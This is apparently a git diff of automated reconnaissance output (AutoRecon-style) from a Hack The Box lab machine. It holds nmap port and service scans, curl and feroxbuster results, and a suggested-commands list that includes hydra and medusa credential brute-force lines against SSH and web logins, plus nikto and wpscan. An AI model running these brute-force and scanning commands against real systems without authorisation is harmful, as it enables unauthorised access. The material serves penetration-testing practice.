medusa -U "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P "/usr/share/seclists/Passwords/darkweb2017-top100.txt" -e ns -n 22 -O "/home/kali/htb/results/scans/tcp22/tcp_22_ssh_medusa.txt" -M ssh -h 10.129.123.2
[*] http on tcp/80
[-] (feroxbuster) Multi-threaded recursive directory/file enumeration for web servers using various wordlists:
feroxbuster -u http://10.129.123.2:80 -t 10 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x "txt,html,php,asp,aspx,jsp" -v -k -n -e -o /home/kali/htb/results/scans/tcp80/tcp_80_http_feroxbuster_dirbuster.txt
[-] Credential bruteforcing commands (don't run these without modifying them):
hydra -L "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P "/usr/share/seclists/Passwords/darkweb2017-top100.txt" -e nsr -s 80 -o "/home/kali/htb/results/scans/tcp80/tcp_80_http_auth_hydra.txt" http-get://10.129.123.2/path/to/auth/area
medusa -U "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P "/usr/share/seclists/Passwords/darkweb2017-top100.txt" -e ns -n 80 -O "/home/kali/htb/results/scans/tcp80/tcp_80_http_auth_medusa.txt" -M http -h 10.129.123.2 -m DIR:/path/to/auth/area
hydra -L "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P "/usr/share/seclists/Passwords/darkweb2017-top100.txt" -e nsr -s 80 -o "/home/kali/htb/results/scans/tcp80/tcp_80_http_form_hydra.txt" http-post-form://10.129.123.2/path/to/login.php:"username=^USER^&password=^PASS^":"invalid-login-message"
medusa -U "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P "/usr/share/seclists/Passwords/darkweb2017-top100.txt" -e ns -n 80 -O "/home/kali/htb/results/scans/tcp80/tcp_80_http_form_medusa.txt" -M web-form -h 10.129.123.2 -m FORM:/path/to/login.php -m FORM-DATA:"post?username=&password=" -m DENY-SIGNAL:"invalid login message"
[-] (nikto) old but generally reliable web server enumeration tool:
nikto -ask=no -h http://10.129.123.2:80 2>&1 | tee "/home/kali/htb/results/scans/tcp80/tcp_80_http_nikto.txt"
[-] (wpscan) WordPress Security Scanner (useful if WordPress is found):
wpscan --url http://10.129.123.2:80/ --no-update -e vp,vt,tt,cb,dbe,u,m --plugins-detection aggressive --plugins-version-detection aggressive -f cli-no-color 2>&1 | tee "/home/kali/htb/results/scans/tcp80/tcp_80_http_wpscan.txt"
```

2
HTB/encoding/results/report/report.md/10.129.123.2/Patterns.md Normal file
View File

@@ -0,0 +1,2 @@
Identified HTTP Server: Apache/2.4.52 (Ubuntu)

66
HTB/encoding/results/report/report.md/10.129.123.2/Port Scans/PortScan - All TCP Ports.md Normal file
View File

@@ -0,0 +1,66 @@
```bash
nmap -vv --reason -Pn -T4 -sV -sC --version-all -A --osscan-guess -p- -oN "/home/kali/htb/results/scans/_full_tcp_nmap.txt" -oX "/home/kali/htb/results/scans/xml/_full_tcp_nmap.xml" 10.129.123.2
```
[/home/kali/htb/results/scans/_full_tcp_nmap.txt](file:///home/kali/htb/results/scans/_full_tcp_nmap.txt):
```
# Nmap 7.93 scan initiated Sat Jan 28 20:06:56 2023 as: nmap -vv --reason -Pn -T4 -sV -sC --version-all -A --osscan-guess -p- -oN /home/kali/htb/results/scans/_full_tcp_nmap.txt -oX /home/kali/htb/results/scans/xml/_full_tcp_nmap.xml 10.129.123.2
adjust_timeouts2: packet supposedly had rtt of -498094 microseconds. Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -498094 microseconds. Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -201839 microseconds. Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -201839 microseconds. Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -1007316 microseconds. Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -1007316 microseconds. Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -586644 microseconds. Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -586644 microseconds. Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -437252 microseconds. Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -437252 microseconds. Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -233933 microseconds. Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -233933 microseconds. Ignoring time.
Nmap scan report for encoding.htb (10.129.123.2)
Host is up, received user-set (0.026s latency).
Scanned at 2023-01-28 20:06:56 CET for 71s
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 63 OpenSSH 8.9p1 Ubuntu 3ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 4fe3a667a227f9118dc30ed773a02c28 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBIzAFurw3qLK4OEzrjFarOhWslRrQ3K/MDVL2opfXQLI+zYXSwqofxsf8v2MEZuIGj6540YrzldnPf8CTFSW2rk=
| 256 816e78766b8aea7d1babd436b7f8ecc4 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIPTtbUicaITwpKjAQWp8Dkq1glFodwroxhLwJo6hRBUK
80/tcp open http syn-ack ttl 63 Apache httpd 2.4.52 ((Ubuntu))
|_http-title: HaxTables
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.52 (Ubuntu)
Aggressive OS guesses: Linux 5.0 (95%), Linux 5.0 - 5.4 (95%), Linux 5.4 (94%), HP P2000 G3 NAS device (93%), Linux 4.15 - 5.6 (93%), Linux 5.3 - 5.4 (93%), Linux 2.6.32 (92%), Infomir MAG-250 set-top box (92%), Ubiquiti AirMax NanoStation WAP (Linux 2.6.32) (92%), Linux 3.7 (92%)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.93%E=4%D=1/28%OT=22%CT=1%CU=36902%PV=Y%DS=2%DC=T%G=Y%TM=63D5729
OS:7%P=x86_64-pc-linux-gnu)SEQ(SP=105%GCD=1%ISR=10C%TI=Z%CI=Z%II=I%TS=A)SEQ
OS:(SP=106%GCD=1%ISR=10C%TI=Z%CI=Z%TS=A)OPS(O1=M54DST11NW7%O2=M54DST11NW7%O
OS:3=M54DNNT11NW7%O4=M54DST11NW7%O5=M54DST11NW7%O6=M54DST11)WIN(W1=FE88%W2=
OS:FE88%W3=FE88%W4=FE88%W5=FE88%W6=FE88)ECN(R=Y%DF=Y%T=40%W=FAF0%O=M54DNNSN
OS:W7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%D
OS:F=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O
OS:=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=N)U1(R=Y%DF=N
OS:%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)U1(R=N)IE(R=Y%DFI=N
OS:%T=40%CD=S)
Uptime guess: 46.015 days (since Tue Dec 13 19:46:08 2022)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=262 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using port 1025/tcp)
HOP RTT ADDRESS
1 25.62 ms 10.10.14.1
2 26.90 ms encoding.htb (10.129.123.2)
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Jan 28 20:08:07 2023 -- 1 IP address (1 host up) scanned in 71.78 seconds
```

61
HTB/encoding/results/report/report.md/10.129.123.2/Port Scans/PortScan - Top 100 UDP Ports.md Normal file
View File

@@ -0,0 +1,61 @@
```bash
nmap -vv --reason -Pn -T4 -sU -A --top-ports 100 -oN "/home/kali/htb/results/scans/_top_100_udp_nmap.txt" -oX "/home/kali/htb/results/scans/xml/_top_100_udp_nmap.xml" 10.129.123.2
```
[/home/kali/htb/results/scans/_top_100_udp_nmap.txt](file:///home/kali/htb/results/scans/_top_100_udp_nmap.txt):
```
# Nmap 7.93 scan initiated Sat Jan 28 20:06:56 2023 as: nmap -vv --reason -Pn -T4 -sU -A --top-ports 100 -oN /home/kali/htb/results/scans/_top_100_udp_nmap.txt -oX /home/kali/htb/results/scans/xml/_top_100_udp_nmap.xml 10.129.123.2
Warning: 10.129.123.2 giving up on port because retransmission cap hit (6).
Increasing send delay for 10.129.123.2 from 100 to 200 due to 11 out of 11 dropped probes since last increase.
Increasing send delay for 10.129.123.2 from 200 to 400 due to 11 out of 11 dropped probes since last increase.
Increasing send delay for 10.129.123.2 from 400 to 800 due to 11 out of 11 dropped probes since last increase.
adjust_timeouts2: packet supposedly had rtt of -184576 microseconds. Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -184576 microseconds. Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -303015 microseconds. Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -303015 microseconds. Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -527666 microseconds. Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -527666 microseconds. Ignoring time.
Nmap scan report for encoding.htb (10.129.123.2)
Host is up, received user-set (0.026s latency).
Scanned at 2023-01-28 20:06:56 CET for 244s
Not shown: 84 closed udp ports (port-unreach)
PORT STATE SERVICE REASON VERSION
68/udp open|filtered dhcpc no-response
80/udp open|filtered http no-response
111/udp open|filtered rpcbind no-response
120/udp open|filtered cfdptkt no-response
135/udp open|filtered msrpc no-response
177/udp open|filtered xdmcp no-response
520/udp open|filtered route no-response
593/udp open|filtered http-rpc-epmap no-response
998/udp open|filtered puparp no-response
999/udp open|filtered applix no-response
3703/udp open|filtered adobeserver-3 no-response
4500/udp open|filtered nat-t-ike no-response
49186/udp open|filtered unknown no-response
49190/udp open|filtered unknown no-response
49192/udp open|filtered unknown no-response
49193/udp open|filtered unknown no-response
Too many fingerprints match this host to give specific OS details
TCP/IP fingerprint:
SCAN(V=7.93%E=4%D=1/28%OT=%CT=%CU=7%PV=Y%DS=2%DC=T%G=N%TM=63D57344%P=x86_64-pc-linux-gnu)
SEQ(CI=Z%II=I)
SEQ(CI=Z)
T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)
T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)
U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)
IE(R=Y%DFI=N%T=40%CD=S)
Network Distance: 2 hops
TRACEROUTE (using port 49152/udp)
HOP RTT ADDRESS
1 25.83 ms 10.10.14.1
2 26.04 ms encoding.htb (10.129.123.2)
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Jan 28 20:11:00 2023 -- 1 IP address (1 host up) scanned in 243.96 seconds
```

67
HTB/encoding/results/report/report.md/10.129.123.2/Port Scans/PortScan - Top TCP Ports.md Normal file
View File

@@ -0,0 +1,67 @@
```bash
nmap -vv --reason -Pn -T4 -sV -sC --version-all -A --osscan-guess -oN "/home/kali/htb/results/scans/_quick_tcp_nmap.txt" -oX "/home/kali/htb/results/scans/xml/_quick_tcp_nmap.xml" 10.129.123.2
```
[/home/kali/htb/results/scans/_quick_tcp_nmap.txt](file:///home/kali/htb/results/scans/_quick_tcp_nmap.txt):
```
# Nmap 7.93 scan initiated Sat Jan 28 20:06:56 2023 as: nmap -vv --reason -Pn -T4 -sV -sC --version-all -A --osscan-guess -oN /home/kali/htb/results/scans/_quick_tcp_nmap.txt -oX /home/kali/htb/results/scans/xml/_quick_tcp_nmap.xml 10.129.123.2
adjust_timeouts2: packet supposedly had rtt of -660845 microseconds. Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -660845 microseconds. Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -666152 microseconds. Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -666152 microseconds. Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -583847 microseconds. Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -583847 microseconds. Ignoring time.
Nmap scan report for encoding.htb (10.129.123.2)
Host is up, received user-set (0.028s latency).
Scanned at 2023-01-28 20:06:56 CET for 29s
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 63 OpenSSH 8.9p1 Ubuntu 3ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 4fe3a667a227f9118dc30ed773a02c28 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBIzAFurw3qLK4OEzrjFarOhWslRrQ3K/MDVL2opfXQLI+zYXSwqofxsf8v2MEZuIGj6540YrzldnPf8CTFSW2rk=
| 256 816e78766b8aea7d1babd436b7f8ecc4 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIPTtbUicaITwpKjAQWp8Dkq1glFodwroxhLwJo6hRBUK
80/tcp open http syn-ack ttl 63 Apache httpd 2.4.52 ((Ubuntu))
|_http-title: HaxTables
|_http-server-header: Apache/2.4.52 (Ubuntu)
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
OS fingerprint not ideal because: Didn't receive UDP response. Please try again with -sSU
Aggressive OS guesses: HP P2000 G3 NAS device (91%), Linux 5.0 (89%), Linux 5.4 (89%), Linux 5.0 - 5.4 (88%), OpenWrt Kamikaze 7.09 (Linux 2.6.22) (88%), Linux 3.1 (88%), Linux 3.2 (88%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (87%), OpenWrt 0.9 - 7.09 (Linux 2.4.30 - 2.4.34) (87%), OpenWrt White Russian 0.9 (Linux 2.4.30) (87%)
No exact OS matches for host (test conditions non-ideal).
TCP/IP fingerprint:
SCAN(V=7.93%E=4%D=1/28%OT=22%CT=1%CU=%PV=Y%DS=2%DC=T%G=N%TM=63D5726D%P=x86_64-pc-linux-gnu)
SEQ(SP=FF%GCD=1%ISR=10D%TI=Z%CI=Z%II=I%TS=B)
SEQ(SP=FF%GCD=1%ISR=10D%TI=Z%II=I%TS=A)
OPS(O1=M54DST11NW7%O2=M54DST11NW7%O3=M54DNNT11NW7%O4=M54DST11NW7%O5=M54DST11NW7%O6=M54DST11)
WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=FE88)
ECN(R=Y%DF=Y%TG=40%W=FAF0%O=M54DNNSNW7%CC=Y%Q=)
T1(R=Y%DF=Y%TG=40%S=O%A=S+%F=AS%RD=0%Q=)
T2(R=N)
T3(R=N)
T4(R=Y%DF=Y%TG=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)
T5(R=Y%DF=Y%TG=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)
T6(R=Y%DF=Y%TG=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)
T6(R=N)
T7(R=N)
U1(R=N)
IE(R=Y%DFI=N%TG=40%CD=S)
Uptime guess: 46.015 days (since Tue Dec 13 19:46:08 2022)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=255 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using port 21/tcp)
HOP RTT ADDRESS
1 25.03 ms 10.10.14.1
2 26.51 ms encoding.htb (10.129.123.2)
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Jan 28 20:07:25 2023 -- 1 IP address (1 host up) scanned in 29.16 seconds
```

69
HTB/encoding/results/report/report.md/10.129.123.2/Services/Service - tcp-22-ssh/Nmap SSH.md Normal file
View File

@@ -0,0 +1,69 @@
```bash
nmap -vv --reason -Pn -T4 -sV -p 22 --script="banner,ssh2-enum-algos,ssh-hostkey,ssh-auth-methods" -oN "/home/kali/htb/results/scans/tcp22/tcp_22_ssh_nmap.txt" -oX "/home/kali/htb/results/scans/tcp22/xml/tcp_22_ssh_nmap.xml" 10.129.123.2
```
[/home/kali/htb/results/scans/tcp22/tcp_22_ssh_nmap.txt](file:///home/kali/htb/results/scans/tcp22/tcp_22_ssh_nmap.txt):
```
# Nmap 7.93 scan initiated Sat Jan 28 20:07:25 2023 as: nmap -vv --reason -Pn -T4 -sV -p 22 --script=banner,ssh2-enum-algos,ssh-hostkey,ssh-auth-methods -oN /home/kali/htb/results/scans/tcp22/tcp_22_ssh_nmap.txt -oX /home/kali/htb/results/scans/tcp22/xml/tcp_22_ssh_nmap.xml 10.129.123.2
Nmap scan report for encoding.htb (10.129.123.2)
Host is up, received user-set (0.039s latency).
Scanned at 2023-01-28 20:07:26 CET for 2s
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 63 OpenSSH 8.9p1 Ubuntu 3ubuntu0.1 (Ubuntu Linux; protocol 2.0)
|_banner: SSH-2.0-OpenSSH_8.9p1 Ubuntu-3ubuntu0.1
| ssh2-enum-algos:
| kex_algorithms: (10)
| curve25519-sha256
| curve25519-sha256@libssh.org
| ecdh-sha2-nistp256
| ecdh-sha2-nistp384
| ecdh-sha2-nistp521
| sntrup761x25519-sha512@openssh.com
| diffie-hellman-group-exchange-sha256
| diffie-hellman-group16-sha512
| diffie-hellman-group18-sha512
| diffie-hellman-group14-sha256
| server_host_key_algorithms: (4)
| rsa-sha2-512
| rsa-sha2-256
| ecdsa-sha2-nistp256
| ssh-ed25519
| encryption_algorithms: (6)
| chacha20-poly1305@openssh.com
| aes128-ctr
| aes192-ctr
| aes256-ctr
| aes128-gcm@openssh.com
| aes256-gcm@openssh.com
| mac_algorithms: (10)
| umac-64-etm@openssh.com
| umac-128-etm@openssh.com
| hmac-sha2-256-etm@openssh.com
| hmac-sha2-512-etm@openssh.com
| hmac-sha1-etm@openssh.com
| umac-64@openssh.com
| umac-128@openssh.com
| hmac-sha2-256
| hmac-sha2-512
| hmac-sha1
| compression_algorithms: (2)
| none
|_ zlib@openssh.com
| ssh-auth-methods:
| Supported authentication methods:
| publickey
|_ password
| ssh-hostkey:
| 256 4fe3a667a227f9118dc30ed773a02c28 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBIzAFurw3qLK4OEzrjFarOhWslRrQ3K/MDVL2opfXQLI+zYXSwqofxsf8v2MEZuIGj6540YrzldnPf8CTFSW2rk=
| 256 816e78766b8aea7d1babd436b7f8ecc4 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIPTtbUicaITwpKjAQWp8Dkq1glFodwroxhLwJo6hRBUK
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Jan 28 20:07:28 2023 -- 1 IP address (1 host up) scanned in 2.73 seconds
```

3
HTB/encoding/results/report/report.md/10.129.123.2/Services/Service - tcp-80-http/Curl Robots.md Normal file
View File

@@ -0,0 +1,3 @@
```bash
curl -sSikf http://10.129.123.2:80/robots.txt
```

65
HTB/encoding/results/report/report.md/10.129.123.2/Services/Service - tcp-80-http/Curl.md Normal file
View File

@@ -0,0 +1,65 @@
```bash
curl -sSik http://10.129.123.2:80/
```
[/home/kali/htb/results/scans/tcp80/tcp_80_http_curl.html](file:///home/kali/htb/results/scans/tcp80/tcp_80_http_curl.html):
```
HTTP/1.1 200 OK
Date: Sat, 28 Jan 2023 19:07:09 GMT
Server: Apache/2.4.52 (Ubuntu)
Vary: Accept-Encoding
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>HaxTables</title>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1">
<link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.4.1/css/bootstrap.min.css">
<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.6.0/jquery.min.js"></script>
<script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.4.1/js/bootstrap.min.js"></script>
<link rel="stylesheet" href="assets/css/main.css">
<script src="./assets/js/main.js"></script>
</head>
<body>
<h1 align="center">HaxTables</h1>
<br><br>
<div class="container">
<nav class="navbar navbar-inverse">
<div class="container-fluid">
<div class="navbar-header">
<a class="navbar-brand" href="/">HaxTables</a>
</div>
<ul class="nav navbar-nav">
<li class="active"><a href="/">Home</a></li>
<li class="dropdown"><a class="dropdown-toggle" data-toggle="dropdown" href="#">Convertions<span class="caret"></span></a>
<ul class="dropdown-menu">
<li><a href="/index.php?page=string">String</a></li>
<li><a href="/index.php?page=integer">Integer</a></li>
<li><a href="/index.php?page=image">Images</a></li>
</ul>
</li>
<li><a href="#">About us</a></li>
<li><a href="/index.php?page=api">API</a></li>
</ul>
</div>
</nav>
<p align="center">Free online String and Number converter. Just load your input and they will automatically get converted to selected format. A collection of useful utilities for working with String and Integer values. All are simple, free and easy to use. There are no ads, popups or other garbage!</p>
<p align="center">
<img src="../assets/img/index.png">
</p>
</div>
</body>
</html>
```

41
HTB/encoding/results/report/report.md/10.129.123.2/Services/Service - tcp-80-http/Directory Buster.md Normal file
View File

@@ -0,0 +1,41 @@
```bash
feroxbuster -u http://10.129.123.2:80/ -t 10 -w /root/.local/share/AutoRecon/wordlists/dirbuster.txt -x "txt,html,php,asp,aspx,jsp" -v -k -n -q -e -o "/home/kali/htb/results/scans/tcp80/tcp_80_http_feroxbuster_dirbuster.txt"
```
[/home/kali/htb/results/scans/tcp80/tcp_80_http_feroxbuster_dirbuster.txt](file:///home/kali/htb/results/scans/tcp80/tcp_80_http_feroxbuster_dirbuster.txt):
```
403 GET 9l 28w 277c http://10.129.123.2/.htaccess
403 GET 9l 28w 277c http://10.129.123.2/.hta
403 GET 9l 28w 277c http://10.129.123.2/.htpasswd
403 GET 9l 28w 277c http://10.129.123.2/.htaccess.txt
403 GET 9l 28w 277c http://10.129.123.2/.hta.txt
403 GET 9l 28w 277c http://10.129.123.2/.htpasswd.txt
403 GET 9l 28w 277c http://10.129.123.2/.htaccess.html
403 GET 9l 28w 277c http://10.129.123.2/.hta.html
403 GET 9l 28w 277c http://10.129.123.2/.htpasswd.html
403 GET 9l 28w 277c http://10.129.123.2/.htaccess.php
403 GET 9l 28w 277c http://10.129.123.2/.hta.php
403 GET 9l 28w 277c http://10.129.123.2/.htaccess.asp
403 GET 9l 28w 277c http://10.129.123.2/.htpasswd.php
403 GET 9l 28w 277c http://10.129.123.2/.hta.asp
200 GET 2206l 13654w 619037c http://10.129.123.2/assets/img/index.png
403 GET 9l 28w 277c http://10.129.123.2/.htpasswd.asp
403 GET 9l 28w 277c http://10.129.123.2/.htaccess.aspx
403 GET 9l 28w 277c http://10.129.123.2/.hta.aspx
403 GET 9l 28w 277c http://10.129.123.2/.htpasswd.aspx
403 GET 9l 28w 277c http://10.129.123.2/.htaccess.jsp
403 GET 9l 28w 277c http://10.129.123.2/.hta.jsp
200 GET 48l 137w 0c http://10.129.123.2/index.php
403 GET 9l 28w 277c http://10.129.123.2/.htpasswd.jsp
200 GET 167l 329w 3025c http://10.129.123.2/assets/css/main.css
200 GET 31l 80w 1019c http://10.129.123.2/assets/js/main.js
200 GET 48l 137w 0c http://10.129.123.2/
403 GET 9l 28w 277c http://10.129.123.2/.html
403 GET 9l 28w 277c http://10.129.123.2/.php
301 GET 9l 28w 313c http://10.129.123.2/assets => http://10.129.123.2/assets/
200 GET 1l 2w 0c http://10.129.123.2/handler.php
301 GET 9l 28w 315c http://10.129.123.2/includes => http://10.129.123.2/includes/
403 GET 9l 28w 277c http://10.129.123.2/server-status
```

3
HTB/encoding/results/report/report.md/10.129.123.2/Services/Service - tcp-80-http/Known Security.md Normal file
View File

@@ -0,0 +1,3 @@
```bash
curl -sSikf http://10.129.123.2:80/.well-known/security.txt
```

149
HTB/encoding/results/report/report.md/10.129.123.2/Services/Service - tcp-80-http/Nmap HTTP.md Normal file
View File

@@ -0,0 +1,149 @@
```bash
nmap -vv --reason -Pn -T4 -sV -p 80 --script="banner,(http* or ssl*) and not (brute or broadcast or dos or external or http-slowloris* or fuzzer)" -oN "/home/kali/htb/results/scans/tcp80/tcp_80_http_nmap.txt" -oX "/home/kali/htb/results/scans/tcp80/xml/tcp_80_http_nmap.xml" 10.129.123.2
```
[/home/kali/htb/results/scans/tcp80/tcp_80_http_nmap.txt](file:///home/kali/htb/results/scans/tcp80/tcp_80_http_nmap.txt):
```
# Nmap 7.93 scan initiated Sat Jan 28 20:07:25 2023 as: nmap -vv --reason -Pn -T4 -sV -p 80 "--script=banner,(http* or ssl*) and not (brute or broadcast or dos or external or http-slowloris* or fuzzer)" -oN /home/kali/htb/results/scans/tcp80/tcp_80_http_nmap.txt -oX /home/kali/htb/results/scans/tcp80/xml/tcp_80_http_nmap.xml 10.129.123.2
Nmap scan report for encoding.htb (10.129.123.2)
Host is up, received user-set (0.025s latency).
Scanned at 2023-01-28 20:07:26 CET for 160s
Bug in http-security-headers: no string output.
PORT STATE SERVICE REASON VERSION
80/tcp open http syn-ack ttl 63 Apache httpd 2.4.52 ((Ubuntu))
|_http-drupal-enum: Nothing found amongst the top 100 resources,use --script-args number=<number|all> for deeper analysis)
|_http-mobileversion-checker: No mobile version detected.
|_http-server-header: Apache/2.4.52 (Ubuntu)
|_http-wordpress-enum: Nothing found amongst the top 100 resources,use --script-args search-limit=<number|all> for deeper analysis)
|_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
| http-referer-checker:
| Spidering limited to: maxpagecount=30
| https://ajax.googleapis.com:443/ajax/libs/jquery/3.6.0/jquery.min.js
|_ https://maxcdn.bootstrapcdn.com:443/bootstrap/3.4.1/js/bootstrap.min.js
|_http-wordpress-users: [Error] Wordpress installation was not found. We couldn't find wp-login.php
|_http-fetch: Please enter the complete path of the directory to save data in.
|_http-devframework: Couldn't determine the underlying framework or CMS. Try increasing 'httpspider.maxpagecount' value to spider more pages.
|_http-litespeed-sourcecode-download: Request with null byte did not work. This web server might not be vulnerable
|_http-feed: Couldn't find any feeds.
|_http-jsonp-detection: Couldn't find any JSONP endpoints.
|_http-csrf: Couldn't find any CSRF vulnerabilities.
| http-useragent-tester:
| Status for browser useragent: 200
| Allowed User Agents:
| Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)
| libwww
| lwp-trivial
| libcurl-agent/1.0
| PHP/
| Python-urllib/2.5
| GT::WWW
| Snoopy
| MFC_Tear_Sample
| HTTP::Lite
| PHPCrawl
| URI::Fetch
| Zend_Http_Client
| http client
| PECL::HTTP
| Wget/1.13.4 (linux-gnu)
|_ WWW-Mechanize/1.34
| http-headers:
| Date: Sat, 28 Jan 2023 19:07:19 GMT
| Server: Apache/2.4.52 (Ubuntu)
| Connection: close
| Content-Type: text/html; charset=UTF-8
|
|_ (Request type: HEAD)
| http-comments-displayer:
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=encoding.htb
|
| Path: http://encoding.htb:80/assets/css/main.css
| Line number: 29
| Comment:
| /* The textarea itself */
|
| Path: http://encoding.htb:80/assets/css/main.css
| Line number: 14
| Comment:
| /* Containing areas */
|
| Path: http://encoding.htb:80/assets/css/main.css
| Line number: 41
| Comment:
| /* The status bar */
|
| Path: http://encoding.htb:80/assets/css/main.css
| Line number: 1
| Comment:
| /* Import Google Font */
|
| Path: http://encoding.htb:80/assets/css/main.css
| Line number: 63
| Comment:
| /* The submit button */
|
| Path: http://encoding.htb:80/assets/css/main.css
| Line number: 4
| Comment:
|_ /* RESET */
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-errors: Couldn't find any error pages.
| http-fileupload-exploiter:
|
| Couldn't find a file-type field.
|
|_ Couldn't find a file-type field.
| http-sitemap-generator:
| Directory structure:
| /
| Other: 1; php: 1
| /assets/css/
| css: 1
| /assets/img/
| png: 1
| /assets/js/
| js: 1
| Longest directory structure:
| Depth: 2
| Dir: /assets/img/
| Total files found (by extension):
|_ Other: 1; css: 1; js: 1; php: 1; png: 1
|_http-date: Sat, 28 Jan 2023 19:07:18 GMT; -18s from local time.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| http-traceroute:
| HTML title
| Hop #1: 400 Proxy Error
| Hop #2: HaxTables
| Hop #3: HaxTables
| Status Code
| Hop #1: 400
| Hop #2: 200
| Hop #3: 200
| content-type
| Hop #1: text/html; charset=iso-8859-1
| Hop #2: text/html; charset=UTF-8
| Hop #3: text/html; charset=UTF-8
| content-length
| Hop #1: 424
| Hop #2
|_ Hop #3
|_http-title: HaxTables
|_http-malware-host: Host appears to be clean
| http-enum:
|_ /includes/: Potentially interesting folder
| http-php-version: Logo query returned unknown hash 6f7d4fa5b2f90ff61821fd1e824a06fa
|_Credits query returned unknown hash 6f7d4fa5b2f90ff61821fd1e824a06fa
|_http-config-backup: ERROR: Script execution failed (use -d to debug)
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-chrono: Request times for /; avg: 172.22ms; min: 158.15ms; max: 186.15ms
| http-vhosts:
|_128 names had status 200
